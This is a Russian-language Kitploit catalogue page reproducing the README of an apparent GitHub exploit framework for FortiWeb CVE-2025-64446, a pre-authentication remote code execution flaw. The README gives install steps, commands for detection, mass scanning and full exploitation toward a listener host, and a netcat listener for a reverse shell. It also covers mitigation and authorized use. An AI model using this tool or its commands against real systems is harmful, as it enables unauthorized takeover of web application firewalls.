Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
FortiWeb-cve-2025-64446-RCE-exploit — Инструмент для исследования безопасности уязвимости FortiWeb CVE-2025-64446. Автоматизированная платформа эксплуатации с расширенным логированием, метриками в реальном времени, отладкой через прокси и профессиональной отчетностью. Включает логику повторов, многопоточность и настраиваемые параметры. Только для авторизованного тестирования безопасности. CVSS 9.8 Critical. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/fortiweb-cve-2025-64446-rce-exploit
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubcerberusmrxi/fortiweb-cve-2025-64446-rce-exploit

FortiWeb-cve-2025-64446-RCE-exploit

Репозиторий
121 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Инструмент для исследования безопасности уязвимости FortiWeb CVE-2025-64446. Автоматизированная платформа эксплуатации с расширенным логированием, метриками в реальном времени, отладкой через прокси и профессиональной отчетностью. Включает логику повторов, многопоточность и настраиваемые параметры. Только для авторизованного тестирования безопасности. CVSS 9.8 Critical.

Поделиться

FortiWeb CVE-2025-64446 RCE Эксплойт

Python License CVSS CVE Status Version

Профессиональный фреймворк для исследований в области безопасности и оценки уязвимостей

Установка · Быстрый старт · Использование · Архитектура · Справочник CLI · Отказ от ответственности


Обзор

FortiWeb Research Tool — это Python-фреймворк для оценки, предназначенный для авторизованного обнаружения и анализа CVE-2025-64446 — критической проблемы удалённого выполнения кода до аутентификации, затрагивающей межсетевые экраны веб-приложений FortiWeb.

АтрибутДетали
АвторSudeepa Wanigarathna
CVECVE-2025-64446
CVSS9.8 (Критический)
КлассОбход аутентификации + обход пути → произвольная загрузка файлов → RCE
Затронутые версииСборки до 7.6.7 / 7.8.7 / 8.0.2 (сверьтесь с официальным бюллетенем)
УстранениеОбновитесь до исправленной версии FortiWeb
ЯзыкPython 3.7+
Точка входаexploit.py

Ключевые возможности

РежимФлагиНазначение
Обнаружение--detect-onlyНе эксплуатационные индикаторы уязвимости
Безопасный / только чтение--safe-modeПропуск шагов эксплуатации, изменяющих состояние
Массовое сканирование--targets + --scan-modeПараллельная оценка нескольких целей
Эксплуатация--target + --lhostКонтролируемая цепочка только в авторизованных лабораториях
Пробный запуск--dry-runПроверка процесса без применения изменений
Отчётность--output-dirОтчёты о тестировании в форматах JSON + HTML

Сводка по уязвимости

ПолеЗначение
CVE IDCVE-2025-64446
Оценка CVSS9.8 (Критический)
ВоздействиеПолная компрометация системы при успешной эксплуатации
ИсправлениеОбновитесь до 7.6.7, 7.8.7, 8.0.2 или более поздней версии

Перед определением границ тестирования всегда сверяйте затронутые и исправленные версии с Fortinet PSIRT.


📸 Скриншоты

ИспользованиеРезультаты сканирования
Панель управленияРезультаты сканирования
HTML-вывод
Вывод терминала

Установка

root@kitploit:~
git clone https://github.com/CerberusMrXi/FortiWeb-cve-2025-64446-RCE-exploit
cd FortiWeb-cve-2025-64446-RCE-exploit

python3 -m venv venv
source venv/bin/activate          # Linux / macOS
# venv\Scripts\activate           # Windows

pip install -r requirements.txt
python3 exploit.py --help

Зависимости

ПакетРоль
requests, urllib3HTTP-клиент
rich, colorama, tqdmТерминальный интерфейс и индикаторы прогресса
pyyamlЗагрузка config.yaml

Опционально (для разработки): pytest, black, flake8, mypy, python-dotenv — см. requirements.txt.


Быстрый старт

root@kitploit:~
# Vulnerability check only (recommended first)
python3 exploit.py --target https://192.168.1.100:8443 --detect-only

# Safe / read-only checks
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode

# Mass scanning
python3 exploit.py --targets targets.txt --scan-mode --threads 10

# Authorized exploitation (requires listener host)
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444

Примечание: Для режима эксплуатации требуется --lhost. Используйте --detect-only или --safe-mode, если вы не планируете запускать полную цепочку.


Руководство по использованию

Режим обнаружения

root@kitploit:~
python3 exploit.py --target https://192.168.1.100:8443 --detect-only
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --verbose
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --timeout 30

Режим обнаружения оценивает доступность цели, признаки версии, экспонирование API, индикаторы обхода пути, сигналы обхода аутентификации и доступность конечной точки загрузки. На основе этих индикаторов риск классифицируется как критический / высокий / средний / низкий.

Массовое сканирование

root@kitploit:~
cat > targets.txt << 'EOF'
https://192.168.1.100:8443
https://192.168.1.101:8443
https://192.168.1.102:8443
EOF

python3 exploit.py --targets targets.txt --scan-mode
python3 exploit.py --targets targets.txt --scan-mode --threads 20 --verbose
python3 exploit.py --targets targets.txt --scan-mode --output-dir ./reports

ScannerManager запускает рабочие процессы FortiWebScanner через пул потоков, выводит сводную таблицу Rich и записывает scan_report.json / scan_report.html.

Режим эксплуатации (только авторизованные лаборатории)

root@kitploit:~
# Start your listener first (example)
nc -lvnp 4444

python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --proxy http://127.0.0.1:8080
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --dry-run
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --user-agent "Research/1.0"

Файл конфигурации

root@kitploit:~
# config.yaml
target: https://192.168.1.100:8443
lhost: 192.168.1.50
lport: 4444
timeout: 15
threads: 5
verify_ssl: false
verbose: true
proxy: http://127.0.0.1:8080
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
output_dir: reports
log_dir: logs
detect_only: false
safe_mode: false
dry_run: false
root@kitploit:~
python3 exploit.py --config config.yaml
python3 exploit.py --config config.yaml --target https://10.0.0.1:8443 --lport 9999

Флаги CLI переопределяют значения, загруженные из YAML.


Архитектура

root@kitploit:~
exploit.py
├── ExploitConfig / ExploitResult / RequestMetrics   # dataclasses
├── LogManager                                       # exploit.log, errors.log, requests.log
├── Banner / StatusDisplay                           # Rich / colorama UI
├── FortiWebScanner                                  # detect-only checks (no exploit chain)
├── ScannerManager                                   # threaded multi-target scans + reports
├── FortiWebExploit                                  # single-target detect / exploit workflow
└── main()                                           # argparse + mode dispatch
КомпонентОтветственность
FortiWebScannerПроверки доступности, версии и индикаторов CVE
ScannerManagerПараллельные сканирования, сводки JSON/HTML, сводная таблица
FortiWebExploitСессия на основе конфигурации, повторные попытки, метрики, отчёты, опциональный путь эксплуатации
LogManagerСтруктурированное журналирование в файлы и цветная консоль

Общий процесс для одной цели:

  1. Настройка баннера и журналирования
  2. Проверка доступности и версии
  3. Проверки индикаторов (или полная цепочка, если не используется режим обнаружения / безопасный режим)
  4. Отчёт JSON + HTML в каталоге reports/
  5. Очистка, где применимо

Возможности

Обнаружение

  • Проверки индикаторов обхода пути для путей API управления
  • Проверки сигналов обхода аутентификации
  • Определение версии FortiWeb через распространённые конечные точки статуса и версии
  • Картирование открытых конечных точек API
  • Проверки доступности конечной точки загрузки файлов
  • Расчёт уровня риска на основе объединённых индикаторов

Отчётность и наблюдаемость

  • Отчёты JSON и HTML с временными метками
  • Метрики по каждому запросу (статус, задержка, процент успешных ответов)
  • Отдельные журналы: exploit.log, errors.log, requests.log

Операционные настройки

  • Многопоточное массовое сканирование (--threads)
  • Поддержка HTTP/HTTPS-прокси (например, Burp)
  • Повторные попытки с настраиваемым количеством и задержкой (по умолчанию: 3 / 2 с)
  • Пользовательский User-Agent, тайм-аут, переключатель проверки SSL (--no-verify)
  • Цветной вывод в консоль через Colorama и Rich

Генерируемые результаты

root@kitploit:~
reports/
├── report_YYYYMMDD_HHMMSS.json
├── report_YYYYMMDD_HHMMSS.html
├── scan_report.json
└── scan_report.html

logs/
├── exploit.log
├── errors.log
└── requests.log

Пример JSON-отчёта (обнаружение)

root@kitploit:~
{
  "metadata": {
    "tool_name": "FortiWeb Research Tool",
    "version": "1.0",
    "author": "Sudeepa Wanigarathna",
    "timestamp": "2026-07-31T00:02:17",
    "mode": "detect"
  },
  "target": {
    "url": "https://192.168.1.100:8443",
    "reachable": true,
    "version": "7.6.0",
    "vulnerable": true,
    "risk_level": "Critical"
  },
  "metrics": {
    "total_requests": 12,
    "average_response_time": 0.42,
    "success_rate": 0.91
  }
}

Справочник команд

root@kitploit:~
python3 exploit.py [OPTIONS]
ОпцияОписание
--target URLБазовый URL одного FortiWeb
--targets FILEСписок целей, разделённых переводами строк
--lhost IPХост прослушивателя (обязателен для эксплуатации)
--lport PORTПорт прослушивателя (по умолчанию: 4444)
--config FILEКонфигурация YAML
--detect-onlyТолько обнаружение; пропустить цепочку эксплуатации
--scan-modeСканирование нескольких целей (требуется --targets)
--safe-modeТолько чтение; пропустить изменяющие состояние шаги
--dry-runПробный запуск без применения изменений
--timeout SECТайм-аут запроса (по умолчанию: 15)
--threads NКоличество рабочих потоков сканирования (по умолчанию: 5)
--proxy URLHTTP-прокси
--user-agent STRПользовательский User-Agent
-v, --verboseПодробное журналирование и вывод в консоль
--no-verifyОтключить проверку TLS-сертификатов
--output-dir DIRКаталог отчётов (по умолчанию: reports)
--log-dir DIRКаталог журналов (по умолчанию: logs)
-h, --helpПоказать справку

Структура проекта

root@kitploit:~
.
├── exploit.py           # Research tool (detect / scan / exploit)
├── config.yaml          # Example configuration
├── requirements.txt     # Python dependencies
├── reports/             # Generated JSON / HTML reports
├── logs/                # Runtime logs
├── LICENSE
├── SECURITY.md
├── .gitignore
└── README.md

Рекомендации по смягчению последствий

  1. Обновите FortiWeb до исправленной версии (7.6.7+, 7.8.7+, 8.0.2+ или согласно актуальным рекомендациям PSIRT).
  2. Ограничьте доступ к интерфейсам управления доверенными сетями и промежуточными хостами.
  3. Отслеживайте активность аутентификации и служебных API на предмет аномального доступа.
  4. Смените учётные данные и проверьте целостность после любого подтверждённого воздействия.
  5. После установки исправлений повторно запустите --detect-only / --safe-mode, чтобы убедиться в устранении уязвимости.

Правовое и этическое предупреждение

Этот инструмент предназначен только для авторизованного тестирования безопасности, исследований и обучения.

  • Используйте только на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение
  • Соблюдайте правила ответственного раскрытия уязвимостей и программ bug bounty
  • Не используйте для несанкционированного доступа, причинения вреда или незаконной деятельности

Используя данное программное обеспечение, вы подтверждаете, что имеете разрешение, не будете злоупотреблять им и принимаете на себя полную ответственность за свои действия. Автор не несёт ответственности за неправомерное использование.

См. SECURITY.md для конфиденциального сообщения об уязвимостях, связанных с этим проектом.


Ресурсы

  • Fortinet PSIRT
  • Бюллетень: FG-IR-25-64446
  • Загрузка исправлений
  • NVD: CVE-2025-64446

Участие в разработке

  1. Сделайте форк репозитория
  2. Создайте ветку: git checkout -b feature/your-change
  3. Сделайте коммит с понятным сообщением
  4. Запушьте изменения и откройте Pull Request

Пожалуйста, проверяйте изменения только в авторизованных лабораторных средах и не добавляйте в коммиты данные реальных целей, cookie-файлы или учётные данные.


Лицензия

Лицензия MIT — см. LICENSE.

Copyright (c) 2026 Sudeepa Wanigarathna


Автор и поддержка

АвторSudeepa Wanigarathna
IssuesGitHub Issues для этого репозитория
БезопасностьСм. SECURITY.md · [email protected]

Только авторизованные исследования · FortiWeb CVE-2025-64446

Наверх

Скачать инструмент